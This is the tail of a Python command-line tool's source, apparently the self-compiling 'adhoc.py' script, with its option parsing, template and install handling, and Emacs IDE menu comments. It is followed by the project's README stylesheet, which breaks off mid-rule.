    myself = AdHoc.read_source(myfile)
    if False:
        adhoc_check_modules()                            # |:debug:|
        adhoc_check_module_setup()                       # |:debug:|
        # import ws_sql_tools
        # ws_sql_tools.dbg_fwid = dbg_fwid
        # NOTE(review): dead branch (if False); this call depends on the
        # commented-out import above being re-enabled.
        ws_sql_tools.check_file()
        import_cmd_sections = AdHoc.tag_lines(
            myself, AdHoc.line_tag('adhoc'))
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       'import_cmd_sections', import_cmd_sections))
        import_cmd_sections = AdHoc.tag_split(
            myself, AdHoc.line_tag('adhoc'))
        adhoc_dump_sections(import_cmd_sections)
    pass
    # |:here:|
    # @:adhoc_disable:@
    # @:adhoc_disable:@ -more_development_tests
    # @:adhoc_remove:@
    # split own source into the parts inside/outside adhoc_remove sections
    ah_retained, ah_removed = AdHoc.tag_partition(
        myself, AdHoc.section_tag('adhoc_remove'))
    hl('REMOVED')
    adhoc_dump_list(ah_removed)
    hl('RETAINED')
    adhoc_dump_list(ah_retained)
    # @:adhoc_remove:@
    # |:debug:| def/class
    ah = AdHoc()
    ah_run_time_section = ah.prepare_run_time_section()
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'ah_run_time_section', ah_run_time_section))
    # adhoc_check_modules()                              # |:debug:|
    # adhoc_check_module_setup()                         # |:debug:|
    # adhoc_check_encode_module()                        # |:debug:|
    # |:debug:| compiler
    # self-compile and print the result to stdout
    ah = AdHoc()
    compiled = ah.compile(myself, 'myself')
    printf(compiled, end='')
    # @:adhoc_disable:@
    # |:here:|
    return
# --------------------------------------------------
# |||:sec:||| MAIN
# --------------------------------------------------
# Global verbosity state; main() rewrites these from the command line
# (-q / -v / --debug) before run() is invoked.
_quiet = False
_verbose = False
_debug = False
# (progn (forward-line 1) (snip-insert-mode "py.f.setdefaultencoding" t) (insert "\n"))
# True: the sources are known to be encoding-clean, which makes
# setdefaultencoding() below a no-op.
file_encoding_is_clean = True
def setdefaultencoding(encoding=None, quiet=False):
    """Force the Python 2 default string encoding (default: ``utf-8``).

    No-op when ``file_encoding_is_clean`` is set or on Python 3, where
    the default encoding is already UTF-8.  On Python 2 it prefers the
    ``sys._setdefaultencoding`` alias installed via sitecustomize.py and
    falls back to the ``reload(sys)`` hack, printing advice to stderr
    unless ``quiet`` is true.
    """
    # nothing to do when the sources are known to be encoding-clean
    if file_encoding_is_clean:
        return
    encoding = 'utf-8' if encoding is None else encoding
    try:
        # raises NameError on Python 3 (no `basestring`), which skips the
        # whole Python 2 machinery below
        isinstance('', basestring)
        if not hasattr(sys, '_setdefaultencoding'):
            if not quiet:
                printf('''\
Add this to /etc/python2.x/sitecustomize.py,
or put it in local sitecustomize.py and adjust PYTHONPATH=".:${PYTHONPATH}"::
    try:
        import sys
        setattr(sys, '_setdefaultencoding', getattr(sys, 'setdefaultencoding'))
    except AttributeError:
        pass
Running with reload(sys) hack ...
''', file=sys.stderr)
            # reload(sys) restores the setdefaultencoding attribute that
            # site.py normally deletes
            reload(sys)
            setattr(sys, '_setdefaultencoding',
                    getattr(sys, 'setdefaultencoding'))
        sys._setdefaultencoding(encoding)
    except NameError:
        # Python 3: default encoding is already UTF-8, nothing to do
        pass
def main(argv): # ||:fnc:||
    """Command line entry point.

    Parses options (argparse, with a canned fallback), adjusts the global
    verbosity flags, dispatches the adhoc operations (--implode,
    --explode, --extract, --template, --expected, --documentation,
    --install), runs the doctests for --test, and otherwise hands over
    to run().  Returns 0 on handled operations.
    """
    global _quiet, _debug, _verbose
    global RtAdHoc, AdHoc
    global adhoc_rst_to_ascii
    _parameters = None
    _pass_opts = []
    try:
        # try system library first
        import argparse
    except ImportError:
        # use canned version
        try:
            import argparse_local as argparse # @:adhoc:@
        except ImportError:
            printe('error: argparse missing. Try `easy_install argparse`.')
            sys.exit(1)
    parser = argparse.ArgumentParser(add_help=False)
    # parser.add_argument('--sum', dest='accumulate', action='store_const',
    #                     const=sum, default=max,
    #                     help='sum the integers (default: find the max)')
    # |:opt:| add options
    # AdHocAction makes the adhoc operation options mutually exclusive:
    # selecting one clears all the others and records the option value
    # in namespace.adhoc_arg.
    class AdHocAction(argparse.Action):
        def __call__(self, parser, namespace, values, option_string=None):
            list(map(lambda opt: setattr(namespace, opt, False),
                     ('implode', 'explode', 'extract', 'template', 'eide',
                      # |:special:|
                      'compile', 'decompile'
                      # |:special:|
                      )))
            setattr(namespace, option_string[2:], True)
            setattr(namespace, 'adhoc_arg', values)
    # |:special:|
    parser.add_argument(
        '-c', '--compile', nargs=0, action=AdHocAction, default=False,
        help='compile file(s) or standard input into file OUT (default standard output).')
    parser.add_argument(
        '-d', '--decompile', nargs=0, action=AdHocAction, default=False,
        help='decompile file(s) or standard input into DIR (default __adhoc__).')
    parser.add_argument(
        '-o', '--output', action='store', type=str, default=None,
        help='output file/directory for --compile/--decompile.')
    # |:special:|
    parser.add_argument(
        '-q', '--quiet', action='store_const', const=-2,
        dest='debug', default=0, help='suppress warnings')
    parser.add_argument(
        '-v', '--verbose', action='store_const', const=-1,
        dest='debug', default=0, help='verbose test output')
    parser.add_argument(
        '--debug', nargs='?', action='store', type=int, metavar='NUM',
        default = 0, const = 1,
        help='show debug information')
    parser.add_argument(
        '-t', '--test', action='store_true',
        help='run doc tests')
    parser.add_argument(
        '--implode', nargs=0, action=AdHocAction, default=False,
        help='implode script with adhoc')
    parser.add_argument(
        '--explode', nargs='?', action=AdHocAction, type=str, metavar='DIR',
        default=False, const='__adhoc__',
        help='explode script with adhoc in directory DIR'
        ' (default: `__adhoc__`)')
    parser.add_argument(
        '--extract', nargs='?', action=AdHocAction, type=str, metavar='DIR',
        default=False, const = '.',
        help='extract files to directory DIR (default: `.`)')
    parser.add_argument(
        '--template', nargs='?', action=AdHocAction, type=str, metavar='NAME',
        default=False, const = '-',
        help='extract named template to standard output. default NAME is ``-``')
    parser.add_argument(
        '--eide', nargs='?', action=AdHocAction, type=str, metavar='COMM',
        default=False, const = '',
        help='Emacs IDE template list (implies --template list)')
    parser.add_argument(
        '--expected', nargs='?', action=AdHocAction, type=str, metavar='DIR',
        default=False, const = '.',
        help='extract expected output to directory DIR (default: `.`)')
    parser.add_argument(
        '-h', '--help', action='store_true',
        help="display this help message")
    # |:special:|
    parser.add_argument(
        '--documentation', action='store_true',
        help="display module documentation.")
    parser.add_argument(
        '--install', action='store_true',
        help="install adhoc.py script.")
    # |:special:|
    parser.add_argument(
        '--ap-help', action='store_true',
        help="internal help message")
    parser.add_argument(
        'args', nargs='*', metavar='arg',
        #'args', nargs='+', metavar='arg',
        #type=argparse.FileType('r'), default=sys.stdin,
        help='a series of arguments')
    #_parameters = parser.parse_args()
    # parse_known_args keeps unrecognized options in _pass_opts
    (_parameters, _pass_opts) = parser.parse_known_args(argv[1:])
    # generate argparse help
    if _parameters.ap_help:
        parser.print_help()
        return 0
    # standard help
    if _parameters.help:
        # |:special:|
        # print the module docstring up to the _END_OF_HELP marker,
        # converted from reST to plain ASCII
        help_msg = __doc__
        help_msg = re.sub(
            '^\\s*[.][.]\\s+_END_OF_HELP:\\s*\n.*(?ms)', '', help_msg)
        sys.stdout.write(adhoc_rst_to_ascii(help_msg).strip() + '\n')
        # |:special:|
        return 0
    # fold the single --debug/-v/-q counter into the three global flags
    _debug = _parameters.debug
    if _debug > 0:
        _verbose = True
        _quiet = False
    elif _debug < 0:
        _verbose = (_debug == -1)
        _quiet = not(_verbose)
        _debug = 0
    _parameters.debug = _debug
    _parameters.verbose = _verbose
    _parameters.quiet = _quiet
    if _debug:
        cmd_line = argv
        sys.stderr.write(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[\n",
            ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# ')),
            ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9)),
            ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (15)),
            ':DBG:', 'cmd_line', cmd_line))
    # at least use `quiet` to suppress the setdefaultencoding warning
    setdefaultencoding(quiet=_quiet or _parameters.test)
    # |:opt:| handle options
    # adhoc: implode/explode/extract
    adhoc_export = (_parameters.explode or _parameters.extract)
    adhoc_op = (_parameters.implode or adhoc_export
                or _parameters.template or _parameters.eide
                # |:special:|
                or _parameters.documentation
                or _parameters.install
                or _parameters.expected
                # |:special:|
                )
    if adhoc_op:
        # |:special:|
        # compiled AdHoc RtAdHoc
        # compiled v
        # implode req req
        # explode req req
        # extract req req
        # template req(v) req
        #
        # uncompiled --- AdHoc ---> implode --> (compiled)
        # compiled -- RtAdHoc --> explode --> __adhoc__
        # compiled -- RtAdHoc --> extracted --> .
        # compiled -- RtAdHoc --> template --> stdout
        # |:special:|
        file_ = __file__
        source = None
        have_adhoc = 'AdHoc' in globals()
        have_rt_adhoc = 'RtAdHoc' in globals()
        # shall adhoc be imported
        if _parameters.implode or not have_rt_adhoc:
            # shall this file be compiled
            adhoc_compile = not (have_rt_adhoc
                                 # |:special:|
                                 or _parameters.documentation
                                 # |:special:|
                                 )
            # extend sys.path with the executable search path so that a
            # sibling adhoc.py / rt_adhoc.py can be imported
            os_path = os.defpath
            for pv in ('PATH', 'path'):
                try:
                    os_path = os.environ[pv]
                    break
                except KeyError:
                    pass
            os_path = os_path.split(os.pathsep)
            for path_dir in os_path:
                if not path_dir:
                    continue
                if path_dir not in sys.path:
                    sys.path.append(path_dir)
            if not have_adhoc:
                try:
                    import adhoc
                    AdHoc = adhoc.AdHoc
                except ImportError:
                    adhoc_compile = False
                    try:
                        # NOTE(review): binds lowercase `Adhoc`, while the
                        # code below uses `AdHoc` -- looks like a typo
                        # (`as AdHoc` intended); confirm before fixing.
                        from rt_adhoc import RtAdHoc as Adhoc
                    except ImportError:
                        pass
            # |:special:|
            AdHoc.flat = False
            # |:special:|
        else:
            adhoc_compile = False
            AdHoc = RtAdHoc
        AdHoc.quiet = _quiet
        AdHoc.verbose = _verbose
        AdHoc.debug = _debug
        AdHoc.include_path.append(os.path.dirname(file_))
        AdHoc.extra_templates = [
            # |:special:|
            ('README.txt', 'adhoc_template'),
            ('doc/USE_CASES.txt', 'adhoc_template'),
            ('-adhoc_init', 'adhoc_template'),
            # |:special:|
            ]
        AdHoc.template_process_hooks = {
            # |:special:|
            'doc/index.rst': tpl_hook_doc_index_rst
            # |:special:|
            }
        # --eide is --template list with Emacs IDE entry formatting
        if _parameters.eide:
            AdHoc.tt_ide = True
            AdHoc.tt_comment = _parameters.adhoc_arg or ''
            AdHoc.tt_prefix = '. (shell-command "'
            AdHoc.tt_suffix = '")'
            _parameters.template = True
            _parameters.adhoc_arg = 'list'
        if adhoc_compile:
            ah = AdHoc()
            source = ah.compileFile(file_)
        else:
            file_, source = AdHoc.std_source_param(file_)
        # implode
        if _parameters.implode:
            # @:adhoc_enable:@
            # if not _quiet:
            #     list(map(sys.stderr.write,
            #              ["warning: ", os.path.basename(file_),
            #               " already imploded!\n"]))
            # @:adhoc_enable:@
            AdHoc.write_source('-', source)
        # explode
        elif (_parameters.explode
              # |:special:|
              or _parameters.install
              # |:special:|
              ):
            # |:special:|
            if _parameters.install:
                _parameters.adhoc_arg = '__adhoc_install__'
            # |:special:|
            AdHoc.export_dir = _parameters.adhoc_arg
            AdHoc.export(file_, source)
            # |:special:|
            README = get_readme(file_, source, as_template='README.txt', transform=False)
            USE_CASES = get_use_cases(as_template='doc/USE_CASES.txt')
            sv = AdHoc.inc_delimiters()
            AdHoc.export(file_, README)
            AdHoc.export(file_, USE_CASES)
            AdHoc.reset_delimiters(sv)
            # |:special:|
        # extract
        elif _parameters.extract:
            AdHoc.extract_dir = _parameters.adhoc_arg
            AdHoc.extract(file_, source)
            # |:special:|
            # imports, that should be extracted
            for imported in (
                'use_case_000_',
                'use_case_001_templates_',
                'use_case_002_include_',
                'use_case_003_import_',
                'use_case_005_nested_',
                ):
                ximported = ''.join((imported, '.py'))
                ximported = AdHoc.check_xfile(ximported)
                if ximported:
                    simported = AdHoc.get_named_template(imported, file_)
                    AdHoc.write_source(ximported, simported)
            README = get_readme(file_, source, as_template='README.txt', transform=False)
            USE_CASES = get_use_cases(as_template='doc/USE_CASES.txt')
            sv = AdHoc.inc_delimiters()
            AdHoc.extract(file_, README)
            AdHoc.extract(file_, USE_CASES)
            AdHoc.reset_delimiters(sv)
            # |:special:|
        # template
        elif _parameters.template:
            template_name = _parameters.adhoc_arg
            if not template_name:
                template_name = '-'
            if template_name == 'list':
                sys.stdout.write(
                    '\n'.join(AdHoc.template_table(file_, source)) + '\n')
            # |:special:|
            elif template_name == 'README.txt':
                README = get_readme(file_, source, as_template=template_name, transform=False)
                sv = AdHoc.inc_delimiters()
                AdHoc.write_source('-', AdHoc.get_named_template(template_name, file_, README))
                AdHoc.reset_delimiters(sv)
            elif template_name == 'doc/USE_CASES.txt':
                USE_CASES = get_use_cases()
                AdHoc.write_source('-', USE_CASES)
            elif template_name == 'adhoc_init':
                import use_case_000_ as use_case
                use_case.main('script --template'.split())
            # |:special:|
            else:
                template = AdHoc.get_named_template(
                    template_name, file_, source)
                # |:special:|
                # binary templates are written as-is; text templates get
                # the run-time section tags stripped
                try:
                    template = AdHoc.decode_source(template)
                except UnicodeDecodeError:
                    pass
                else:
                    template = AdHoc.section_tag_remove(template, "adhoc_run_time_section")
                # |:special:|
                AdHoc.write_source('-', template)
        # |:special:|
        # expected
        elif _parameters.expected:
            AdHoc.extract_dir = _parameters.adhoc_arg
            AdHoc.extract_templates(file_, source, AdHoc.section_tag('adhoc_expected'))
        # documentation
        elif _parameters.documentation:
            sys.stdout.write(get_readme(file_, source))
        # install
        if _parameters.install:
            # run `setup.py install` inside the exploded tree, then
            # remove the temporary directory again
            here = os.path.abspath(os.getcwd())
            os.chdir(AdHoc.export_dir)
            os.system(''.join((sys.executable, " setup.py install")))
            os.chdir(here)
            import shutil
            shutil.rmtree(AdHoc.export_dir, True)
        # |:special:|
        # restore for subsequent calls to main
        if not have_adhoc:
            del(AdHoc)
        return 0
    # run doc tests
    if _parameters.test:
        import doctest
        doctest.testmod(verbose = _verbose)
        return 0
    # |:opt:| handle options
    run(_parameters, _pass_opts)
if __name__ == "__main__":
    #sys.argv.insert(1, '--debug') # |:debug:|
    # exit with whatever main() returns (None exits with status 0)
    sys.exit(main(sys.argv))
# |:here:|
# @:adhoc_uncomment:@
# @:adhoc_template:@ -test
# Test template.
# @:adhoc_template:@
# @:adhoc_uncomment:@
# Never-executed guard.  NOTE(review): presumably kept only so the
# adhoc_verbatim/adhoc_include directives in the comments below sit at a
# well-defined spot of the file -- confirm before removing.
if False:
    pass
# @:adhoc_verbatim:@ # docutils.conf
# |:info:| The following list is kept in sync with MANIFEST.in.
# This makes it easier to avoid discrepancies between installation
# from source distribution vs. installation from compiled script.
# @:adhoc_include:@ MANIFEST.in
# @:adhoc_include:@ Makefile
# @:adhoc_include:@ README.css
# README.txt is generated
# adhoc.py is this file
# argparse_local.py is imported
# @:adhoc_include:@ doc/Makefile
# @:adhoc_include:@ doc/_static/adhoc-logo-32.ico
# @:adhoc_include:@ doc/adhoc-logo.svg
# @:adhoc_include:@ doc/conf.py
# doc/index.rst is generated
# @:adhoc_include:@ doc/make.bat
# @:adhoc_include:@ doc/z-massage-index.sh
# docutils.conf is included above
# namespace_dict.py is imported
# @:adhoc_include:@ setup.py
# stringformat_local.py is imported
# use_case_00?_* is imported
# adhoc_test is imported
# dist/adhoc.py is generated
# |:here:|
# (progn (forward-line 1) (snip-insert-mode "py.t.ide" t) (insert "\n"))
#
# :ide-menu: Emacs IDE Main Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' (eIDE-menu "z")
# :ide: CSCOPE ON
# . (cscope-minor-mode)
# :ide: CSCOPE OFF
# . (cscope-minor-mode (quote ( nil )))
# :ide: TAGS: forced update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k FORCED=1 tags"))
# :ide: TAGS: update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k tags"))
# :ide: +-#+
# . Utilities ()
# :ide: TOC: Generate TOC with py-toc.py
# . (progn (save-buffer) (compile (concat "py-toc.py ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: CMD: Fold region with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces -width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" nil nil nil t)
# :ide: CMD: Fold region and replace with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces --width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" t nil nil t)
# :ide: +-#+
# . Fold ()
# :ide: CMD: Remove 8 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: CMD: Remove 4 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: +-#+
# . Doctest ()
# :ide: LINT: Check 80 column width ignoring IDE Menus
# . (let ((args " | /srv/ftp/pub/check-80-col.sh -")) (compile (concat "sed 's,^\\(\\|. \\|.. \\|... \\)\\(:ide\\|[.] \\).*,,;s,^ *. (progn (forward-line.*,,' " (buffer-file-name) " " args " | sed 's,^-," (buffer-file-name) ",'")))
# :ide: LINT: Check 80 column width
# . (let ((args "")) (compile (concat "/srv/ftp/pub/check-80-col.sh " (buffer-file-name) " " args)))
# :ide: +-#+
# . Lint Tools ()
# :ide: DELIM: |: SYM :| |:tag:| standard symbol-tag!
# . (symbol-tag-normalize-delimiter (cons (cons nil "|:") (cons ":|" nil)) t)
# :ide: DELIM: :: SYM :: ::fillme:: future standard fill-me tag
# . (symbol-tag-normalize-delimiter (cons (cons nil "::") (cons "::" nil)) t)
# :ide: DELIM: @: SYM :@ @:fillme:@ adhoc tag
# . (symbol-tag-normalize-delimiter (cons (cons nil "@:") (cons ":@" nil)) t)
# :ide: +-#+
# . Delimiters ()
# :ide: COMPILE: Run with --ap-help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --ap-help")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with --test --verbose
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test --verbose")))
# :ide: COMPILE: Run with --debug
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --debug")))
# :ide: +-#+
# . Compile with standard arguments ()
# :ide: OCCUR-OUTLINE: Python Source Code
# . (x-symbol-tag-occur-outline "sec" '("||:" ":||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: MENU-OUTLINE: Python Source Code
# . (x-eIDE-menu-outline "sec" '("|||:" ":|||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: +-#+
# . Outline ()
# :ide: INFO: SQLAlchemy - SQL Expression Language - Reference
# . (let ((ref-buffer "*sqa-expr-ref*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/reference/sqlalchemy/expressions.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - SQL Expression Language - Tutorial
# . (let ((ref-buffer "*sqa-expr-tutor*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/sqlexpression.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - Query
# . (let ((ref-buffer "*sqa-query*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/orm/query.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: +-#+
# . SQLAlchemy Reference ()
# :ide: INFO: Python - argparse
# . (let ((ref-buffer "*python-argparse*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://docs.python.org/library/argparse.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: Python Documentation
# . (let ((ref-buffer "*w3m*")) (if (get-buffer ref-buffer) (display-buffer ref-buffer t)) (other-window 1) (w3m-goto-url "http://docs.python.org/index.html" nil nil))
# :ide: INFO: Python Reference
# . (let* ((ref-buffer "*python-ref*") (local "/home/ws/project/ws-util/python/reference/PQR2.7.html") (url (or (and (file-exists-p local) local) "'http://rgruet.free.fr/PQR27/PQR2.7.html'"))) (unless (get-buffer ref-buffer) (get-buffer-create ref-buffer) (with-current-buffer ref-buffer (shell-command (concat "snc txt.py.reference 2>/dev/null") ref-buffer) (goto-char (point-min)) (if (eobp) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " " url) ref-buffer)))) (display-buffer ref-buffer t))
# :ide: +-#+
# . Python Reference ()
# :ide: COMPILE: Run with --decompile dist/xx_adhoc.py
# . (progn (save-buffer) (compile (concat "rm -rf __adhoc__; cp -p dist/adhoc.py dist/xx_adhoc.py; python ./" (file-name-nondirectory (buffer-file-name)) " --decompile dist/xx_adhoc.py")))
# :ide: COMPILE: Run with cat dist/adhoc.py | --decompile
# . (progn (save-buffer) (compile (concat "rm -rf __adhoc__; cat dist/adhoc.py | python ./" (file-name-nondirectory (buffer-file-name)) " --decompile")))
# :ide: COMPILE: Run with cat /dev/null | --decompile
# . (progn (save-buffer) (compile (concat "rm -rf __adhoc__; cat /dev/null | python ./" (file-name-nondirectory (buffer-file-name)) " --decompile")))
# :ide: COMPILE: Run with cat /dev/null | --compile
# . (progn (save-buffer) (compile (concat "cat /dev/null | python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with cat /dev/null |
# . (progn (save-buffer) (compile (concat "cat /dev/null | python ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with --template doc/index.rst
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template doc/index.rst")))
# :ide: COMPILE: Run with --template test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template test")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with python3 with --template list
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " --template list")))
# :ide: COMPILE: Run with --verbose --implode
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --implode")))
# :ide: COMPILE: Run with --documentation
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --documentation")))
# :ide: COMPILE: make ftp
# . (progn (save-buffer) (compile (concat "make -k ftp")))
# :ide: COMPILE: Run with --verbose --extract
# . (progn (save-buffer) (shell-command "rm -f README.txt doc/index.rst") (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --extract")))
# :ide: COMPILE: Run with --verbose --template README.txt
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --template README.txt")))
# :ide: COMPILE: Run with --template list
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template list")))
# :ide: COMPILE: Run with --eide #
# . (progn (save-buffer) (shell-command (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --eide '#'") (concat "*templates: " (file-name-nondirectory (buffer-file-name)) "*")))
# :ide: COMPILE: Run with --expected
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --expected")))
# :ide: COMPILE: make doc
# . (progn (save-buffer) (compile (concat "make doc")))
# :ide: COMPILE: Run with --eide
# . (progn (save-buffer) (shell-command (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --eide") (concat "*templates: " (file-name-nondirectory (buffer-file-name)) "*")))
# :ide: COMPILE: Run with python3 with --test
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with python3 w/o args
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with --verbose
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End:
/* ------------------------------------------------------------------ */
/* Meyer-style reset: strip default margins, padding, borders and     */
/* font styling from common elements so all browsers start alike.     */
/* ------------------------------------------------------------------ */
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, big, code,
del, dfn, font, img, ins, q, s, samp,
small, strike, strong, tt,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td {
    margin: 0;
    padding: 0;
    border: 0;
    font-weight: inherit;
    font-style: inherit;
    font-size: 100%;
    font-family: inherit;
    vertical-align: baseline;
}
body{
    line-height: 1;
}
.xx ol, .xx ul {
    list-style: none;
}
/* tables still need 'cellspacing="0"' in the markup */
table {
    border-collapse: separate;
    border-spacing: 0;
}
caption ,th, td {
    text-align: left;
    font-weight: normal;
}
/* Suppress browser-generated quotation marks around q/blockquote. */
blockquote:before,blockquote:after,
q:before, q:after {
    content: "";
}
blockquote, q {
    quotes: "" "";
}
/* Base font sizing (YUI-style; the starred declarations are IE6/7-only
   hacks that other browsers ignore). */
body{font:13px/1.231 sans-serif;*font-size:small;*font:x-small;}
select,input,button,textarea,button{font:99% sans-serif;}table{font-size:inherit;font:100%;}pre,code,samp,tt{font-family:monospace;*font-size:108%;line-height:100%;}
div {
    position: relative;
}
section {
    position: relative;
    display: block;
}
/* Headings: muted gray, generous top padding. */
h1 {
    margin: 0 0 15px;
    padding: 1em 0 0;
    font-size: 21px;
    line-height: 24px;
    color: #666;
}
h2 {
    margin: 6px 0;
    padding: 10px 0 0;
    font-weight: normal;
    font-size: 18px;
    line-height: 24px;
    color: #666;
}
/* Inline code gets a light rounded box ... */
code {
    border: 1px solid #ddd;
    background: #f7f7f7;
    padding: 0 2px;
    font-size: 0.923em; /* 12/13 */
    -moz-border-radius: 2px;
    -webkit-border-radius: 2px;
    border-radius: 2px;
}
/* ... but not when nested in pre blocks or headings. */
pre code {
    border: none;
    background: none;
    padding: 0;
    font-size: inherit;
}
h1 code,
h2 code,
h3 code,
h4 code,
h5 code,
h6 code {
    border: none;
    background: none;
}
h3 {
    margin: 6px 0;
    padding: 10px 0 0;
    font-weight: normal;
    font-size: 16px;
    line-height: 21px;
    color: #666;
}
h4 {
    font-weight: normal;
    color: #666;
}
ol {
    list-style: decimal inside;
}
p {
    margin: 0 0 9px;
}
/* Code blocks: boxed, soft-wrapped so long lines stay visible. */
pre {
    margin: 0 0 1em;
    -o-border-radius: 3px;
    -ms-border-radius: 3px;
    -khtml-border-radius: 3px;
    -webkit-border-radius: 3px;
    border-radius: 3px;
    border: 1px solid #ddd;
    background: #f7f7f7;
    padding: 3px 6px;
    font-size: 12px;
    line-height: 16px;
    white-space: pre-wrap;
}
ul {
    display: block;
    list-style-type: disc;
    /* margin: 1em 0; */
    padding: 0 1em;
}
/* NOTE(review): this block originally began with a mid-file
   '@charset "UTF-8";' rule.  @charset is only valid as the very first
   rule of a stylesheet, so browsers silently ignored it here; it has
   been removed as a no-op (the residue of a stylesheet concatenation). */
/* Print stylesheet: force black text on a white background. */
@media print {
    * {
        color: #000 !important;
    }
    body {
        background: #fff !important;
    }
}
/* ------------------------------------------------------------------ */
/* Page chrome: base colors, links, forms and data tables.            */
/* ------------------------------------------------------------------ */
body {
    margin: 0;
    background: #fff;
    padding: 0;
    line-height: 16px;
    font-family: Helvetica, Arial, sans-serif;
    color: #393939;
}
p {
    line-height: 18px;
}
/* Links: no underline until hovered. */
a {
    text-decoration: none;
    color: #2b547d;
}
a:focus {
    color: #69f;
    outline: none;
}
a:hover {
    text-decoration: underline;
}
table {
    border-spacing: 3px;
}
strong {
    font-weight: bold;
}
em {
    font-style: italic;
}
table input, select {
    margin-bottom: 1em;
}
table th {
    vertical-align: top;
}
html, body {
    height: 100%;
}
form {
    margin-bottom: 0;
}
input {
    line-height: 16px;
}
/* Text-entry widgets: light border, subtle inner shadow, rounded. */
input[type="url"], input[type="email"], input[type="password"], input[type="search"], input[type="text"], textarea {
    background: #fff;
    color: #525252;
    padding: 4px;
    font-size: 14px;
    line-height: 18px;
    height: 18px;
    border: 1px solid #ccc;
